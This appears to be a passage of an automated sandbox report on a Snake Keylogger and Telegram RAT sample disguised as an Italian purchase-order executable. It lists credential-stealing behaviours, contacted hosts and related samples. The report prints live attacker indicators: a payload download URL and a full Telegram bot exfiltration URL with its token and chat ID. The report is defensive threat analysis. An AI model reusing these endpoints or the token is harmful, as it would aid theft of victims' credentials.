Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.InstallUtil.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f07750.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2415481714.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4589297423.000000000284C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4586413691.00000000005B2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4589297423.00000000027BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4589297423.00000000028B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2415481714.0000000003F07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4589297423.0000000002601000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe PID: 6332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2676, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: InstallUtil.exe PID: 2676, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f55f70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.InstallUtil.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe.3f07750.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2415481714.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4589297423.000000000284C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4586413691.00000000005B2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4589297423.00000000027BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4589297423.00000000028B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2415481714.0000000003F07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4589297423.0000000002601000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe PID: 6332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2676, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: InstallUtil.exe PID: 2676, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	211 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	51%	Virustotal		Browse
Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	63%	ReversingLabs	Win32.Exploit.Generic
Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://160.22.121.182	0%	Avira URL Cloud	safe
http://160.22.121.182/STATO/Gihdpimpq.mp415V9qXFmSrEpcl2I4Ku6Bqw==	0%	Avira URL Cloud	safe
http://160.22.121.182/STATO/Gihdpimpq.mp4	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.48.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.6.168	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/8.46.123.189	false		high
http://160.22.121.182/STATO/Gihdpimpq.mp4	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendDocument?chat_id=6287380231&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot8174947883:AAE32VUI3xRPjzGu7FWio37OnvSbcEIhiQ8/sendDocument?chat_id=6287	InstallUtil.exe, 00000003.00000002.4589297423.00000000028B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-neti	Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2419737490.0000000006BF0000.00000004.08000000.00040000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003E71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2419737490.0000000006BF0000.00000004.08000000.00040000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2401541375.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003E71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	InstallUtil.exe, 00000003.00000002.4589297423.00000000028B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2419737490.0000000006BF0000.00000004.08000000.00040000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003E71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	InstallUtil.exe, 00000003.00000002.4589297423.00000000028B2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2419737490.0000000006BF0000.00000004.08000000.00040000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003E71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2419737490.0000000006BF0000.00000004.08000000.00040000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003E71000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003F07000.00000004.00000800.00020000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4586413691.00000000005B2000.00000040.00000400.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	InstallUtil.exe, 00000003.00000002.4589297423.00000000026FB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002775000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002767000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000027A2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002748000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002759000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	InstallUtil.exe, 00000003.00000002.4589297423.00000000026D0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002775000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002767000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000027A2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002748000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002759000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2419737490.0000000006BF0000.00000004.08000000.00040000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003E71000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	InstallUtil.exe, 00000003.00000002.4589297423.00000000026FB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002775000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002767000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000027A2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002748000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002759000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	InstallUtil.exe, 00000003.00000002.4589297423.0000000002601000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000026FB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002775000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002767000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000027A2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002748000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002783000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002759000.00000004.00000800.00020000.00000000.sdmp	false		high
http://160.22.121.182	Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2401541375.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.com	InstallUtil.exe, 00000003.00000002.4589297423.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002775000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002767000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000027A2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002748000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002759000.00000004.00000800.00020000.00000000.sdmp	false		high
http://160.22.121.182/STATO/Gihdpimpq.mp415V9qXFmSrEpcl2I4Ku6Bqw==	Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe	false	Avira URL Cloud: safe	unknown
http://api.telegram.org	InstallUtil.exe, 00000003.00000002.4589297423.00000000028B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2401541375.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.0000000002601000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003F07000.00000004.00000800.00020000.00000000.sdmp, Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe, 00000000.00000002.2415481714.0000000003FD2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4589297423.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.4586413691.00000000005B2000.00000040.00000400.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.48.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
160.22.121.182	unknown	unknown	45194	SIPL-ASSysconInfowayPvtLtdIN	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1592710
Start date and time:	2025-01-16 13:09:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/0@3/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 172 Number of non-executed functions: 44
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
07:10:00	API Interceptor	37x Sleep call for process: Ordine Delta Vernici S.r.l. 2422-10749 15 gennaio 2025.exe modified
07:10:29	API Interceptor	10802374x Sleep call for process: InstallUtil.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.48.1	ydJaT4b5N8.exe	Get hash	malicious	FormBook	Browse	www.vilakodsiy.sbs/vq3j/
	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	www.axis138ae.shop/j2vs/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	twirpx.org/administrator/index.php
	SN500, SN150 Spec.exe	Get hash	malicious	FormBook	Browse	www.antipromil.site/7ykh/
149.154.167.220	https://click.pstmrk.it/3s/pub-f1259bdcfa3244278ff5b5e98426e3f4.r2.dev%2FWebmailRoundcube.html%23aurora.allodi%40labcosulich.com/DBLn/8LO6AQ/AQ/35236e43-9c21-41dc-b749-fd6c09ce87b9/1/0Jkr_bNeDj#aurora.allodi@labcosulich.com	Get hash	malicious	HTMLPhisher	Browse
	Faktura VAT-FV2025011500091._pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse
	ORDER-202577008.lnk	Get hash	malicious	Unknown	Browse
	PI ITS15235 (2).doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	rDEKONT-1_16_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	aASfOObWpW.exe	Get hash	malicious	Unknown	Browse
	aASfOObWpW.exe	Get hash	malicious	Unknown	Browse
	Invoice No 1122207 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	qqnal04.exe	Get hash	malicious	Phemedrone Stealer	Browse
	DESCRIPTION.exe	Get hash	malicious	DarkCloud	Browse
193.122.6.168	Faktura VAT-FV2025011500091._pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	ORDER-202577008.lnk	Get hash	malicious	Unknown	Browse	checkip.dyndns.org/
	INQUIRY LIST 292.vbs	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	JHGFDFG.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	MV Nicos Tomasos Vessel Parts.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Order Details.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Contrarre.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Company introduction.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rDEKONT-1_15_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	U23BGA2025REQ.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Notice_bill_of_lading_number_HAWB_771434342326.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	Faktura VAT-FV2025011500091._pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	MACHINE SPECIFICATION.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	54403 ADVANCED DEMURRAGE PROFORMA 15.01.2025.scr.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	ORDER-202577008.lnk	Get hash	malicious	Unknown	Browse	193.122.6.168
	INQUIRY LIST 292.vbs	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	Contrarre.scr.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	PI ITS15235 (2).doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	rDEKONT-1_16_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
reallyfreegeoip.org	U23BGA2025REQ.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	Notice_bill_of_lading_number_HAWB_771434342326.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	Faktura VAT-FV2025011500091._pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	MACHINE SPECIFICATION.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	54403 ADVANCED DEMURRAGE PROFORMA 15.01.2025.scr.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	ORDER-202577008.lnk	Get hash	malicious	Unknown	Browse	104.21.96.1
	INQUIRY LIST 292.vbs	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.96.1
	Contrarre.scr.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	PI ITS15235 (2).doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	rDEKONT-1_16_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
api.telegram.org	https://click.pstmrk.it/3s/pub-f1259bdcfa3244278ff5b5e98426e3f4.r2.dev%2FWebmailRoundcube.html%23aurora.allodi%40labcosulich.com/DBLn/8LO6AQ/AQ/35236e43-9c21-41dc-b749-fd6c09ce87b9/1/0Jkr_bNeDj#aurora.allodi@labcosulich.com	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Faktura VAT-FV2025011500091._pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	ORDER-202577008.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220
	PI ITS15235 (2).doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rDEKONT-1_16_2025__75kb__pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	aASfOObWpW.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	aASfOObWpW.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Invoice No 1122207 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	qqnal04.exe	Get hash	malicious	Phemedrone Stealer	Browse	149.154.167.220
	Inquiry.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	Faktura VAT-FV2025011500091._pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	MACHINE SPECIFICATION.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	ORDER-202577008.lnk	Get hash	malicious	Unknown	Browse	193.122.6.168
	INQUIRY LIST 292.vbs	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	JHGFDFG.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	MV. ASL ROSE - VESSEL'S DESC.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	New PO.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	MV Nicos Tomasos Vessel Parts.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	Order Details.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	Execute.ps1	Get hash	malicious	Metasploit	Browse	158.101.196.44
CLOUDFLARENETUS	Bank payment copy.exe	Get hash	malicious	FormBook	Browse	104.21.80.1
	imYD7uep15.exe	Get hash	malicious	AsyncRAT, VenomRAT	Browse	172.67.19.24
	Beweise_f#U00fcr_Handlungen_die_Rechte_am_geistigen_Eigentum_verletzen.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	-Homecredit - NPRS_PolicyServices.Agreement.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	RFQ PC25-1301 Product Specifications_PDF.exe	Get hash	malicious	FormBook	Browse	104.21.40.196
	random.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	U23BGA2025REQ.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	http://magentacloud.de/s/DeFCB6g8NjbfYpY	Get hash	malicious	Unknown	Browse	104.17.25.14
	Beweise_f#U00fcr_Handlungen_die_Rechte_am_geistigen_Eigentum_verletzen.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	imYD7uep15.exe	Get hash	malicious	AsyncRAT, VenomRAT	Browse	104.20.3.235
TELEGRAMRU	https://click.pstmrk.it/3s/pub-f1259bdcfa3244278ff5b5e98426e3f4.r2.dev%2FWebmailRoundcube.html%23aurora.allodi%40labcosulich.com/DBLn/8LO6AQ/AQ/35236e43-9c21-41dc-b749-fd6c09ce87b9/1/0Jkr_bNeDj#aurora.allodi@labcosulich.com	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Faktura VAT-FV2025011500091._pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
